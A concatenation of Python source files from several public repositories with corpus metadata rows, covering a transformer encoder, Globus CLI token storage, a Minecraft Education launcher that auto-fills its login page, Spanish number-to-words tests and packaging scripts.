any(th.add_data(i) for i in range(20000)) # th.add_data returns None, so the entire range is executed
# time.sleep(0.01) # Not needed
print('The set value', th.value, '| remaining queue size:', th.get_queue_size())
# DO NOT STOP, CLOSE, OR, JOIN THE THREAD
if __name__ == '__main__':
# Run one option at a time
import sys
# Default test run
# run_test = test_thread
# run_test = test_continuous
# run_test = test_pausable
run_test = test_operation
if len(sys.argv) > 1:
value = str(sys.argv[1]).lower()
if value == '0' or value == 'thread':
run_test = test_thread
elif value == '1' or 'continuous' in value:
run_test = test_continuous
elif value == '2' or 'paus' in value:
run_test = test_pausable
elif value == '3' or 'op' in value:
run_test = test_operation
run_test()
# You should observe that python.exe is no longer a running process when the program finishes.
# exit code should be 0
| 25.18
| 106
| 0.608817
| 812
| 0.322478
| 0
| 0
| 0
| 0
| 0
| 0
| 514
| 0.20413
|
b701550eed98d3100b7b0a2a4ed10c335a6dc06a
| 2,587
|
py
|
Python
|
src/models/transformer_encoder.py
|
tsumita/implicit_emotion
|
dae2d5a8162a2665b8e76812716068650feae710
|
[
"MIT"
] | 6
|
2018-09-03T00:55:35.000Z
|
2020-01-09T11:53:31.000Z
|
src/models/transformer_encoder.py
|
tsumita/implicit_emotion
|
dae2d5a8162a2665b8e76812716068650feae710
|
[
"MIT"
] | null | null | null |
src/models/transformer_encoder.py
|
tsumita/implicit_emotion
|
dae2d5a8162a2665b8e76812716068650feae710
|
[
"MIT"
] | 2
|
2019-06-23T11:32:27.000Z
|
2019-07-04T22:15:33.000Z
|
import copy
import torch.nn as nn
from .transformer import (Encoder,
EncoderLayer,
MultiHeadedAttention,
PositionwiseFeedforward,
PositionalEncoding)
class TransformerEncoder(nn.Module):
"""Transformer Encoder"""
def __init__(self, embedding_dim, hidden_sizes, num_layers=6, num_heads=8,
dropout=0.1, batch_first=True, use_cuda=True):
"""Take a batch of representations and add context transformer-style
Parameters
----------
embedding_dim : TODO
hidden_sizes : TODO
num_layers : TODO, optional
num_heads : TODO, optional
dropout : TODO, optional
batch_first: TODO, optional
use_cuda : TODO, optional
"""
if not batch_first:
raise NotImplementedError
super(TransformerEncoder, self).__init__()
self.embedding_dim = embedding_dim
self.hidden_sizes = hidden_sizes
self.num_layers = num_layers
self.num_heads = num_heads
self.dropout = dropout
self.use_cuda = use_cuda
self.out_dim = embedding_dim
# FIXME: I don't know how will deepcopies work within a pytorch module
# <2018-06-25 12:06:59, Jorge Balazs>
c = copy.deepcopy
attn = MultiHeadedAttention(self.num_heads, self.embedding_dim)
ff = PositionwiseFeedforward(self.embedding_dim, self.hidden_sizes,
self.dropout)
position = PositionalEncoding(self.embedding_dim, self.dropout)
self.encoder = Encoder(
EncoderLayer(embedding_dim, c(attn), c(ff), dropout), self.num_layers
)
self.positional_embedding = c(position)
for p in self.parameters():
if p.dim() > 1:
nn.init.xavier_uniform_(p)
def forward(self, emb_batch, masks=None, lengths=None):
"""Add context to a batch of vectors
Parameters
----------
emb_batch : torch.FloatTensor, dim(batch_size, seq_len, hidden_dim)
mask : torch.Floattensor, dim(batch_size, seq_len)
lengths : kept for compatibility with other layers
Returns
-------
A torch.FloatTensor of dim(batch_size, seq_len, hidden_dim) containing
context-enriched vectors
"""
# for compatibility with Annotated Transformer implementation
masks = masks.unsqueeze(1)
return self.encoder(self.positional_embedding(emb_batch), masks)
| 32.3375
| 81
| 0.609586
| 2,328
| 0.899884
| 0
| 0
| 0
| 0
| 0
| 0
| 973
| 0.376111
|
b70252d52453ebc8294d55dbd8e4ca2fdec3a045
| 338
|
py
|
Python
|
bluebottle/members/migrations/0028_merge_20190215_1441.py
|
terrameijar/bluebottle
|
b4f5ba9c4f03e678fdd36091b29240307ea69ffd
|
[
"BSD-3-Clause"
] | 10
|
2015-05-28T18:26:40.000Z
|
2021-09-06T10:07:03.000Z
|
bluebottle/members/migrations/0028_merge_20190215_1441.py
|
terrameijar/bluebottle
|
b4f5ba9c4f03e678fdd36091b29240307ea69ffd
|
[
"BSD-3-Clause"
] | 762
|
2015-01-15T10:00:59.000Z
|
2022-03-31T15:35:14.000Z
|
bluebottle/members/migrations/0028_merge_20190215_1441.py
|
terrameijar/bluebottle
|
b4f5ba9c4f03e678fdd36091b29240307ea69ffd
|
[
"BSD-3-Clause"
] | 9
|
2015-02-20T13:19:30.000Z
|
2022-03-08T14:09:17.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.8 on 2019-02-15 13:41
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('members', '0026_auto_20180919_1434'),
('members', '0027_auto_20190208_1119'),
]
operations = [
]
| 19.882353
| 48
| 0.662722
| 188
| 0.556213
| 0
| 0
| 0
| 0
| 0
| 0
| 139
| 0.411243
|
b7065834b7518e12325dc5b9284ed2b6d23d7a2b
| 5,221
|
py
|
Python
|
src/globus_cli/login_manager/tokenstore.py
|
sirosen/temp-cli-test
|
416fd3fea17b4c7c2cf35d6ccde63cb5719a1af6
|
[
"Apache-2.0"
] | 47
|
2016-04-21T19:51:17.000Z
|
2022-02-25T14:13:30.000Z
|
src/globus_cli/login_manager/tokenstore.py
|
sirosen/temp-cli-test
|
416fd3fea17b4c7c2cf35d6ccde63cb5719a1af6
|
[
"Apache-2.0"
] | 421
|
2016-04-20T18:45:24.000Z
|
2022-03-14T14:50:41.000Z
|
src/globus_cli/login_manager/tokenstore.py
|
sirosen/temp-cli-test
|
416fd3fea17b4c7c2cf35d6ccde63cb5719a1af6
|
[
"Apache-2.0"
] | 20
|
2016-09-10T20:25:27.000Z
|
2021-10-06T16:02:47.000Z
|
import os
import sys
import globus_sdk
from globus_sdk.tokenstorage import SQLiteAdapter
from ._old_config import invalidate_old_config
# internal constants
_CLIENT_DATA_CONFIG_KEY = "auth_client_data"
# env vars used throughout this module
GLOBUS_ENV = os.environ.get("GLOBUS_SDK_ENVIRONMENT")
GLOBUS_PROFILE = os.environ.get("GLOBUS_PROFILE")
def _template_client_id():
template_id = "95fdeba8-fac2-42bd-a357-e068d82ff78e"
if GLOBUS_ENV:
template_id = {
"sandbox": "33b6a241-bce4-4359-9c6d-09f88b3c9eef",
"integration": "e0c31fd1-663b-44e1-840f-f4304bb9ee7a",
"test": "0ebfd058-452f-40c3-babf-5a6b16a7b337",
"staging": "3029c3cb-c8d9-4f2b-979c-c53330aa7327",
"preview": "b2867dbb-0846-4579-8486-dc70763d700b",
}.get(GLOBUS_ENV, template_id)
return template_id
def internal_native_client():
"""
This is the client that represents the CLI itself (prior to templating)
"""
template_id = _template_client_id()
return globus_sdk.NativeAppAuthClient(
template_id, app_name="Globus CLI (native client)"
)
def _get_data_dir():
# get the dir to store Globus CLI data
#
# on Windows, the datadir is typically
# ~\AppData\Local\globus\cli
#
# on Linux and macOS, we use
# ~/.globus/cli/
#
# This is not necessarily a match with XDG_DATA_HOME or macOS use of
# '~/Library/Application Support'. The simplified directories for non-Windows
# platforms will allow easier access to the dir if necessary in support of users
if sys.platform == "win32":
# try to get the app data dir, preferring the local appdata
datadir = os.getenv("LOCALAPPDATA", os.getenv("APPDATA"))
if not datadir:
home = os.path.expanduser("~")
datadir = os.path.join(home, "AppData", "Local")
return os.path.join(datadir, "globus", "cli")
else:
return os.path.expanduser("~/.globus/cli/")
def _ensure_data_dir():
dirname = _get_data_dir()
try:
os.makedirs(dirname)
except FileExistsError:
pass
return dirname
def _get_storage_filename():
datadir = _ensure_data_dir()
return os.path.join(datadir, "storage.db")
def _resolve_namespace():
env = GLOBUS_ENV if GLOBUS_ENV else "production"
# namespace any user profile so that non-user namespaces may be used in the future
# e.g. for client-credentials authenticated use of the CLI
#
# expected namespaces are
#
# userprofile/production (default)
# userprofile/sandbox (env is set to sandbox, profile is unset)
# userprofile/test/myprofile (env is set to test, profile is set to myprofile)
return "userprofile/" + (f"{env}/{GLOBUS_PROFILE}" if GLOBUS_PROFILE else env)
def token_storage_adapter():
if not hasattr(token_storage_adapter, "_instance"):
# when initializing the token storage adapter, check if the storage file exists
# if it does not, then use this as a flag to clean the old config
fname = _get_storage_filename()
if not os.path.exists(fname):
invalidate_old_config(internal_native_client())
# namespace is equal to the current environment
token_storage_adapter._instance = SQLiteAdapter(
fname, namespace=_resolve_namespace()
)
return token_storage_adapter._instance
def internal_auth_client():
"""
Pull template client credentials from storage and use them to create a
ConfidentialAppAuthClient.
In the event that credentials are not found, template a new client via the Auth API,
save the credentials for that client, and then build and return the
ConfidentialAppAuthClient.
"""
adapter = token_storage_adapter()
client_data = adapter.read_config(_CLIENT_DATA_CONFIG_KEY)
if client_data is not None:
client_id = client_data["client_id"]
client_secret = client_data["client_secret"]
else:
# register a new instance client with auth
nc = internal_native_client()
res = nc.post(
"/v2/api/clients",
data={"client": {"template_id": nc.client_id, "name": "Globus CLI"}},
)
# get values and write to config
credential_data = res["included"]["client_credential"]
client_id = credential_data["client"]
client_secret = credential_data["secret"]
adapter.store_config(
_CLIENT_DATA_CONFIG_KEY,
{"client_id": client_id, "client_secret": client_secret},
)
return globus_sdk.ConfidentialAppAuthClient(
client_id, client_secret, app_name="Globus CLI"
)
def delete_templated_client():
adapter = token_storage_adapter()
# first, get the templated credentialed client
ac = internal_auth_client()
# now, remove its relevant data from storage
adapter.remove_config(_CLIENT_DATA_CONFIG_KEY)
# finally, try to delete via the API
# note that this could raise an exception if the creds are already invalid -- the
# caller may or may not want to ignore, so allow it to raise from here
ac.delete(f"/v2/api/clients/{ac.client_id}")
| 34.348684
| 88
| 0.679755
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,510
| 0.480751
|
b706818aa45f72b58b9687e3a435833411cd0110
| 5,325
|
py
|
Python
|
launchMinecraft.py
|
Timurinyo/tchrHlprStudent
|
598f0e1321b11555d327393ab78723e1e286703e
|
[
"MIT"
] | null | null | null |
launchMinecraft.py
|
Timurinyo/tchrHlprStudent
|
598f0e1321b11555d327393ab78723e1e286703e
|
[
"MIT"
] | null | null | null |
launchMinecraft.py
|
Timurinyo/tchrHlprStudent
|
598f0e1321b11555d327393ab78723e1e286703e
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
#coding:utf-8
__author__ = 'CoderZh and Tymur'
import sys
from time import sleep
# Important for multithreading
sys.coinit_flags = 0 # pythoncom.COINIT_MULTITHREADED
import win32com
import win32com.client
import win32gui
import win32con
import pythoncom
#import keyboard
from pathlib import Path
import os
import re
import subprocess
import psutil
def dump(obj):
for attr in dir(obj):
print("obj.%s = %r" % (attr, getattr(obj, attr)))
def getIEServer(hwnd, ieServer):
if win32gui.GetClassName(hwnd) == 'Internet Explorer_Server':
ieServer.append(hwnd)
#def connectToIEServer():
def changeLanguage(lang):
#lang should be uk_UA or en_US
userprofile_folder = os.environ['userprofile']
data_folder = Path(f"{userprofile_folder}/AppData/Local/Packages/Microsoft.MinecraftEducationEdition_8wekyb3d8bbwe/LocalState/games/com.mojang/minecraftpe/")
file_to_open = data_folder / "options.txt"
s = open(file_to_open).read()
repl_result = re.subn(r'game_language:.*', f'game_language:{lang}', s)
f = open(file_to_open, 'w')
f.write(repl_result[0])
f.close()
print("language changed")
def launchMinecraft():
subprocess.call('explorer.exe shell:appsFolder\Microsoft.MinecraftEducationEdition_8wekyb3d8bbwe!Microsoft.MinecraftEducationEdition')
def getCredentials():
cred_path = os.path.join(os.path.dirname(sys.executable), 'credentials.txt')
with open(cred_path) as f:
lines = f.readlines()
login = lines[0]
password = lines[1]
print("credentials received")
return login, password
def wait_password_page_to_load(login_element):
#Wait until password input page is loaded
while(login_element.className != "moveOffScreen"):
for el in doc.all:
try:
if el.name == "loginfmt" and el.className == "moveOffScreen":
login_element = el
#print(el.className)
#sleep(0.1)
except:
print("passwd screen isn't loaded yet")
#sleep(0.1)
continue
sleep(0.1)
def loginIE(login, password):
pythoncom.CoInitializeEx(0) # not use this for multithreading
#Connect to internet explorer server instance
mainHwnd = win32gui.FindWindow('ADALWebBrowserHost', '')
if mainHwnd:
ieServers = []
win32gui.EnumChildWindows(mainHwnd, getIEServer, ieServers)
if len(ieServers) > 0:
ieServer = ieServers[0]
msg = win32gui.RegisterWindowMessage('WM_HTML_GETOBJECT')
ret, result = win32gui.SendMessageTimeout(ieServer, msg, 0, 0, win32con.SMTO_ABORTIFHUNG, 20000)
ob = pythoncom.ObjectFromLresult(result, pythoncom.IID_IDispatch, 0)
doc = win32com.client.dynamic.Dispatch(ob)
print("connected to IE server")
try:
win32gui.SetForegroundWindow(mainHwnd)
except:
print("couldn't SetForegroundWindow 1")
return False
#for i in range(2):
#Make sure that we've got all elements loaded
page_type = ""
login_not_ready = True
submit_not_ready = True
password_not_ready = True
while(login_not_ready or submit_not_ready or password_not_ready):
#Get elements from document
try:
for el in doc.all:
#Try is needed because not all elements have both name and type fields
try:
if el.name == "loginfmt":
login_element = el
login_not_ready = False
print("received login element")
if el.type == "submit":
submit_element = el
submit_not_ready = False
print("received btn element")
if el.name == "passwd":
password_element = el
password_not_ready = False
except:
print("element has no name attribute")
#sleep(0.1)
continue
except:
print("doc isn't loaded yet")
return False
sleep(0.1)
#Figure out what page is loaded
if password_element.className == "moveOffScreen":
page_type = "login_page"
elif login_element.className == "moveOffScreen":
page_type = "password_page"
if page_type == "login_page":
#Paste login
login_element.focus()
login_element.value = login
submit_element.style.backgroundColor = "#000000"
submit_element.focus()
submit_element.blur()
submit_element.click()
wait_password_page_to_load(login_element)
elif page_type == "password_page":
#Paste password
password_element.focus()
password_element.value = password
submit_element.style.backgroundColor = "#000000"
submit_element.focus()
submit_element.blur()
submit_element.click()
print("ok")
return True
else:
print("page_type unspecified")
else:
print("No IE server found")
return False
def launchMine(lessonType):
if lessonType == "PS":
changeLanguage("uk_UA")
elif lessonType == "PR":
changeLanguage("en_US")
else:
print("Unavailable lesson type specified. Should be PS or PR")
login, password = getCredentials()
launchMinecraft()
login_successfull = False
times_launched = 0
while not(login_successfull):
try:
login_successfull = loginIE(login, password)
sleep(0.5)
times_launched += 1
if times_launched > 1200:
return False
except:
print("something went completely wrong...")
return True
def closeMine():
os.system("TASKKILL /F /IM Minecraft.Windows.exe")
| 28.475936
| 159
| 0.689202
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,617
| 0.303662
|
b7076a862b13e824331a204380735697e0b6b508
| 4,158
|
py
|
Python
|
trabajo/Plugins/test_plugin_MontoEscrito.py
|
f2scali/siendo
|
5e3c20143317e365cfecb5b56a0f2388acc46949
|
[
"Apache-2.0"
] | null | null | null |
trabajo/Plugins/test_plugin_MontoEscrito.py
|
f2scali/siendo
|
5e3c20143317e365cfecb5b56a0f2388acc46949
|
[
"Apache-2.0"
] | null | null | null |
trabajo/Plugins/test_plugin_MontoEscrito.py
|
f2scali/siendo
|
5e3c20143317e365cfecb5b56a0f2388acc46949
|
[
"Apache-2.0"
] | 1
|
2021-10-01T22:22:09.000Z
|
2021-10-01T22:22:09.000Z
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
__author__ = 'efrenfuentes'
import unittest
from plugin_MontoEscrito import numero_a_letras, numero_a_moneda
class TestNumeroLetras(unittest.TestCase):
def test_numero_demasiado_alto(self):
numero = 1000000000000
self.assertRaises(OverflowError, numero_a_letras, numero)
def test_unidades(self):
numero = 8
self.assertEqual(numero_a_letras(numero), 'ocho')
numero = 2
self.assertEqual(numero_a_letras(numero), 'dos')
numero = 0
self.assertEqual(numero_a_letras(numero), 'cero')
def test_decena_diez(self):
numero = 15
self.assertEqual(numero_a_letras(numero), 'quince')
numero = 17
self.assertEqual(numero_a_letras(numero), 'diecisiete')
numero = 19
self.assertEqual(numero_a_letras(numero), 'diecinueve')
def test_decena_veinte(self):
numero = 23
self.assertEqual(numero_a_letras(numero), 'veintitres')
numero = 26
self.assertEqual(numero_a_letras(numero), 'veintiseis')
numero = 21
self.assertEqual(numero_a_letras(numero), 'veintiuno')
def test_menores_cien(self):
numero = 32
self.assertEqual(numero_a_letras(numero), 'treinta y dos')
numero = 73
self.assertEqual(numero_a_letras(numero), 'setenta y tres')
numero = 89
self.assertEqual(numero_a_letras(numero), 'ochenta y nueve')
def test_centenas(self):
numero = 167
self.assertEqual(numero_a_letras(numero), 'ciento sesenta y siete')
numero = 735
self.assertEqual(numero_a_letras(numero), 'setecientos treinta y cinco')
numero = 899
self.assertEqual(numero_a_letras(numero), 'ochocientos noventa y nueve')
def test_miles(self):
numero = 1973
self.assertEqual(numero_a_letras(numero), 'mil novecientos setenta y tres')
numero = 5230
self.assertEqual(numero_a_letras(numero), 'cinco mil doscientos treinta')
numero = 41378
self.assertEqual(numero_a_letras(numero), 'cuarenta y un mil trescientos setenta y ocho')
numero = 197356
self.assertEqual(numero_a_letras(numero), 'ciento noventa y siete mil trescientos cincuenta y seis')
numero = 2004
self.assertEqual(numero_a_letras(numero), 'dos mil cuatro')
def test_millones(self):
numero = 11852739
self.assertEqual(numero_a_letras(numero), 'once millones ochocientos cincuenta y dos mil setecientos treinta y nueve')
numero = 2000000
self.assertEqual(numero_a_letras(numero), 'dos millones')
def test_millardos(self):
numero = 1212673201
self.assertEqual(numero_a_letras(numero), 'mil doscientos doce millones seiscientos setenta y tres mil doscientos uno')
numero = 56547567945
self.assertEqual(numero_a_letras(numero), 'cincuenta y seis mil quinientos cuarenta y siete millones quinientos sesenta y siete mil novecientos cuarenta y cinco')
def test_decimales(self):
numero = 1.87
self.assertEqual(numero_a_letras(numero), 'uno punto ochenta y siete')
numero = 1.50
self.assertEqual(numero_a_letras(numero), 'uno punto cincuenta')
numero = 1.04
self.assertEqual(numero_a_letras(numero), 'uno punto cero cuatro')
numero = 1.00
self.assertEqual(numero_a_letras(numero), 'uno')
def test_negativos(self):
numero = -4.5
self.assertEqual(numero_a_letras(numero), 'menos cuatro punto cincuenta')
def test_moneda(self):
numero = 1212673201
self.assertEqual(numero_a_moneda(numero), 'mil doscientos doce millones seiscientos setenta y tres mil doscientos un pesos con cero centavos')
numero = 56547567945.5
self.assertEqual(numero_a_moneda(numero), 'cincuenta y seis mil quinientos cuarenta y siete millones quinientos sesenta y siete mil novecientos cuarenta y cinco pesos con cincuenta centavos')
numero = 1.01
self.assertEqual(numero_a_moneda(numero), 'un peso con un centavo')
if __name__ == '__main__':
unittest.main()
| 39.980769
| 199
| 0.685907
| 3,954
| 0.950938
| 0
| 0
| 0
| 0
| 0
| 0
| 1,120
| 0.26936
|
b708d72fd35c4c8f3891e434790ce2fd08903cc3
| 2,238
|
py
|
Python
|
setup.py
|
hivesolutions/pconvert
|
ff4d09400dc1542080d86f3f99c702ab0ef1405d
|
[
"Apache-1.1"
] | 4
|
2020-04-18T08:38:42.000Z
|
2020-12-10T01:54:57.000Z
|
setup.py
|
hivesolutions/pconvert
|
ff4d09400dc1542080d86f3f99c702ab0ef1405d
|
[
"Apache-1.1"
] | 3
|
2020-09-09T16:40:47.000Z
|
2020-11-11T13:21:58.000Z
|
setup.py
|
hivesolutions/pconvert
|
ff4d09400dc1542080d86f3f99c702ab0ef1405d
|
[
"Apache-1.1"
] | 4
|
2016-09-28T10:32:42.000Z
|
2020-11-11T12:39:02.000Z
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import os
import setuptools
setuptools.setup(
name = "pconvert-python",
version = "0.4.1",
author = "Hive Solutions Lda.",
author_email = "development@hive.pt",
description = "PNG Convert",
license = "Apache License, Version 2.0",
keywords = "pconvert converted compositor",
url = "http://pconvert.hive.pt",
packages = [
"pconvert_py",
"pconvert_py.test"
],
test_suite = "pconvert_py.test",
package_dir = {
"" : os.path.normpath("src/python")
},
ext_modules = [
setuptools.Extension(
"pconvert",
include_dirs = ["src/pconvert", "/usr/local/include"],
libraries = [] if os.name in ("nt",) else ["m", "png"],
library_dirs = ["/usr/local/lib"],
extra_compile_args = [] if os.name in ("nt",) else [
"-O3",
"-finline-functions",
"-Winline"
],
sources = [
"src/pconvert/extension.c",
"src/pconvert/opencl.c",
"src/pconvert/pconvert.c",
"src/pconvert/stdafx.c",
"src/pconvert/structs.c",
"src/pconvert/util.c"
],
define_macros = [
("PCONVERT_EXTENSION", None),
("PASS_ERROR", None)
]
)
],
classifiers = [
"Development Status :: 5 - Production/Stable",
"Topic :: Utilities",
"License :: OSI Approved :: Apache Software License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 2.6",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3.0",
"Programming Language :: Python :: 3.1",
"Programming Language :: Python :: 3.2",
"Programming Language :: Python :: 3.3",
"Programming Language :: Python :: 3.4",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7"
]
)
| 33.402985
| 68
| 0.498213
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,129
| 0.504468
|
b70b18ff12c786f422768e26c9e8b6e9b54e1407
| 2,281
|
py
|
Python
|
tf2onnx/optimizer/optimizer_base.py
|
gcunhase/tensorflow-onnx
|
8a61c99fbc39c36d70781f95e2c7c582f46ba2db
|
[
"Apache-2.0"
] | 1,473
|
2018-03-16T02:47:33.000Z
|
2022-03-31T03:43:52.000Z
|
tf2onnx/optimizer/optimizer_base.py
|
gcunhase/tensorflow-onnx
|
8a61c99fbc39c36d70781f95e2c7c582f46ba2db
|
[
"Apache-2.0"
] | 1,208
|
2018-03-14T09:58:49.000Z
|
2022-03-31T17:56:20.000Z
|
tf2onnx/optimizer/optimizer_base.py
|
gcunhase/tensorflow-onnx
|
8a61c99fbc39c36d70781f95e2c7c582f46ba2db
|
[
"Apache-2.0"
] | 350
|
2018-04-03T03:48:40.000Z
|
2022-03-30T11:23:55.000Z
|
# SPDX-License-Identifier: Apache-2.0
"""Graph Optimizer Base"""
import copy
from .. import logging, utils
class GraphOptimizerBase(object):
"""optimizer graph to improve performance
"""
def __init__(self):
self._logger = logging.getLogger('.'.join(__name__.split('.')[:-1] + [self.__class__.__name__]))
self._graph_been_opt = False
self.opt_iteration = 0
@property
def logger(self):
return self._logger
@property
def is_debug_mode(self):
return utils.is_debug_mode()
@property
def graph_been_opt(self):
return self._graph_been_opt
@graph_been_opt.setter
def graph_been_opt(self, value):
self._graph_been_opt = value
def optimize(self, graph, iteration):
""" Optimize graph, return optimized graph. """
before = graph.dump_node_statistics()
self.opt_iteration = iteration
graph = self._optimize(graph)
graph.update_proto()
graph.delete_unused_nodes(graph.outputs)
after = graph.dump_node_statistics()
self._print_stat_diff(before, after)
return graph
def _optimize(self, graph):
""" Derived class should override this function. """
raise NotImplementedError
@staticmethod
def _apply_optimization(graph, optimize_func):
"""
optimize graph
will also optimize graph of nodes'
Args:
graph: the top level graph to be optimized
optimize_func: function to optimize graph
"""
graph = optimize_func(graph)
for node in graph.get_nodes():
body_graphs = node.get_body_graphs()
if body_graphs:
for attr, b_g in body_graphs.items():
b_g = GraphOptimizerBase._apply_optimization(b_g, optimize_func)
node.set_body_graph_as_attr(attr, b_g)
return graph
def _print_stat_diff(self, before, after):
diff = copy.deepcopy(after)
diff.subtract(before)
diff = ["{} {} ({}->{})".format(k, str(v) if v < 0 else '+' + str(v), before.get(k, 0), after.get(k, 0))
for k, v in sorted(diff.items()) if v != 0]
self.logger.verbose(', '.join(diff) if diff else "no change")
| 29.623377
| 112
| 0.615081
| 2,167
| 0.950022
| 0
| 0
| 954
| 0.418238
| 0
| 0
| 455
| 0.199474
|
b70b7e3ec23c6100b7d22c2fc18a52d85615b5ef
| 3,299
|
py
|
Python
|
train.py
|
anishjain18/Trigger-Word-Detector
|
85d635cabc553c612db414853b4569ec869d9bf7
|
[
"MIT"
] | 15
|
2021-11-03T04:33:22.000Z
|
2022-03-30T18:24:57.000Z
|
train.py
|
anishjain18/Trigger-Word-Detector
|
85d635cabc553c612db414853b4569ec869d9bf7
|
[
"MIT"
] | null | null | null |
train.py
|
anishjain18/Trigger-Word-Detector
|
85d635cabc553c612db414853b4569ec869d9bf7
|
[
"MIT"
] | 21
|
2021-11-03T04:34:11.000Z
|
2022-03-22T10:17:06.000Z
|
import numpy as np
from pydub import AudioSegment
import random
import sys
import io
import os
import glob
import IPython
from td_utils import *
from tensorflow.keras.callbacks import ModelCheckpoint
from tensorflow.keras.models import Model, load_model, Sequential
from tensorflow.keras.layers import Dense, Activation, Dropout, Input, Masking, TimeDistributed, LSTM, Conv1D
from tensorflow.keras.layers import GRU, Bidirectional, BatchNormalization, Reshape
from tensorflow.keras.optimizers import Adam
Tx = 5511 # The number of time steps input to the model from the spectrogram
n_freq = 101 # Number of frequencies input to the model at each time step of the spectrogram
Ty = 1375 # The number of time steps in the output of our model
X = np.load("./XY_train/X0.npy")
Y = np.load("./XY_train/Y0.npy")
X = np.concatenate((X, np.load("./XY_train/X1.npy")), axis=0)
Y = np.concatenate((Y, np.load("./XY_train/Y1.npy")), axis=0)
Y = np.swapaxes(Y, 1, 2)
# Load preprocessed dev set examples
X_dev = np.load("./XY_dev/X_dev.npy")
Y_dev = np.load("./XY_dev/Y_dev.npy")
# GRADED FUNCTION: model
def modelf(input_shape):
"""
Function creating the model's graph in Keras.
Argument:
input_shape -- shape of the model's input data (using Keras conventions)
Returns:
model -- Keras model instance
"""
X_input = Input(shape = input_shape)
### START CODE HERE ###
# Step 1: CONV layer (≈4 lines)
X = Conv1D(196, kernel_size = 15, strides = 4)(X_input) # CONV1D
X = BatchNormalization()(X) # Batch normalization
X = Activation("relu")(X) # ReLu activation
X = Dropout(0.8)(X) # dropout (use 0.8)
# Step 2: First GRU Layer (≈4 lines)
X = GRU(units = 128, return_sequences = True)(X) # GRU (use 128 units and return the sequences)
X = Dropout(0.8)(X) # dropout (use 0.8)
X = BatchNormalization()(X) # Batch normalization
# Step 3: Second GRU Layer (≈4 lines)
X = GRU(units = 128, return_sequences = True)(X) # GRU (use 128 units and return the sequences)
X = Dropout(0.8)(X) # dropout (use 0.8)
X = BatchNormalization()(X) # Batch normalization
X = Dropout(0.8)(X) # dropout (use 0.8)
# Step 4: Time-distributed dense layer (≈1 line)
X = TimeDistributed(Dense(1, activation = "sigmoid"))(X) # time distributed (sigmoid)
### END CODE HERE ###
model = Model(inputs = X_input, outputs = X)
return model
model = modelf(input_shape = (Tx, n_freq))
model.summary()
opt = Adam(lr=0.001, beta_1=0.9, beta_2=0.999, decay=0.01)
model.compile(loss='binary_crossentropy', optimizer=opt, metrics=["accuracy"])
model.fit(X, Y, batch_size=20, epochs=100)
loss, acc = model.evaluate(X_dev, Y_dev)
print("Dev set accuracy = ", acc)
from tensorflow.keras.models import model_from_json
json_file = open('./models/model_new3.json', 'r')
loaded_model_json = json_file.read()
json_file.close()
model = model_from_json(loaded_model_json)
model.load_weights('./models/model_new3.h5')
| 34.726316
| 109
| 0.632313
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,188
| 0.359238
|
b70ca02982a56be8fc00bc20da13192c0eb44f5a
| 1,753
|
py
|
Python
|
armchem/workspace.py
|
mmgalushka/armchem
|
00bd0d2085b47b03724af422b75e2801619b8c03
|
[
"MIT"
] | 3
|
2020-05-13T21:48:26.000Z
|
2020-10-18T14:42:00.000Z
|
armchem/workspace.py
|
mmgalushka/armchem
|
00bd0d2085b47b03724af422b75e2801619b8c03
|
[
"MIT"
] | null | null | null |
armchem/workspace.py
|
mmgalushka/armchem
|
00bd0d2085b47b03724af422b75e2801619b8c03
|
[
"MIT"
] | 1
|
2022-02-27T01:04:38.000Z
|
2022-02-27T01:04:38.000Z
|
# =====================================================
# Copyright (c) 2017-present, AUROMIND Ltd.
# =====================================================
import os
from network import NeuralNetwork
from experiments import Experiment
from utils import save_object, load_object
# -----------------------------------------------------
# Exporting Method
# -----------------------------------------------------
def create_workspace(root=''):
return Workspace(root)
# -----------------------------------------------------
# Workspace Handler
# -----------------------------------------------------
class Workspace(object):
def __init__(self, root):
self.__root_dir = root
self.__models_dir = 'models'
self.__experiments_dir = 'experiments'
def save(self, file_name, artifact):
if isinstance(artifact, NeuralNetwork):
base = os.path.join(self.__root_dir, self.__models_dir)
save_object(
os.path.join(base, file_name + '.cfg'),
(artifact.get_input_metadata(), artifact.get_output_metadata())
)
artifact.get_model().save_weights(os.path.join(base, file_name + '.wt'))
elif isinstance(artifact, Experiment):
basedir = os.path.join(self.__root_dir, self.__experiments_dir)
save_object(
os.path.join(basedir, file_name + '.exp'),
artifact
)
else:
raise Exception('Attempt to save unsupported artifact.')
def load_experiment(self, name):
basedir = os.path.join(self.__root_dir, self.__experiments_dir)
return load_object(
os.path.join(basedir, name + '.exp')
)
| 31.872727
| 84
| 0.497433
| 1,141
| 0.650884
| 0
| 0
| 0
| 0
| 0
| 0
| 495
| 0.282373
|
b70d32e911f44e99f8dbffab2918320edced91af
| 4,353
|
py
|
Python
|
uge/objects/cluster_queue_v1_0.py
|
gridengine/config-api
|
694f9667bb6569170356336283a18351456e8b82
|
[
"Apache-2.0"
] | 6
|
2017-01-18T00:11:19.000Z
|
2022-02-10T08:18:00.000Z
|
uge/objects/cluster_queue_v1_0.py
|
gridengine/config-api
|
694f9667bb6569170356336283a18351456e8b82
|
[
"Apache-2.0"
] | 3
|
2017-05-11T13:54:42.000Z
|
2020-08-12T06:15:43.000Z
|
uge/objects/cluster_queue_v1_0.py
|
gridengine/config-api
|
694f9667bb6569170356336283a18351456e8b82
|
[
"Apache-2.0"
] | 4
|
2017-05-11T13:27:33.000Z
|
2019-10-29T02:02:24.000Z
|
#!/usr/bin/env python
#
# ___INFO__MARK_BEGIN__
#######################################################################################
# Copyright 2016-2021 Univa Corporation (acquired and owned by Altair Engineering Inc.)
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License.
#
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
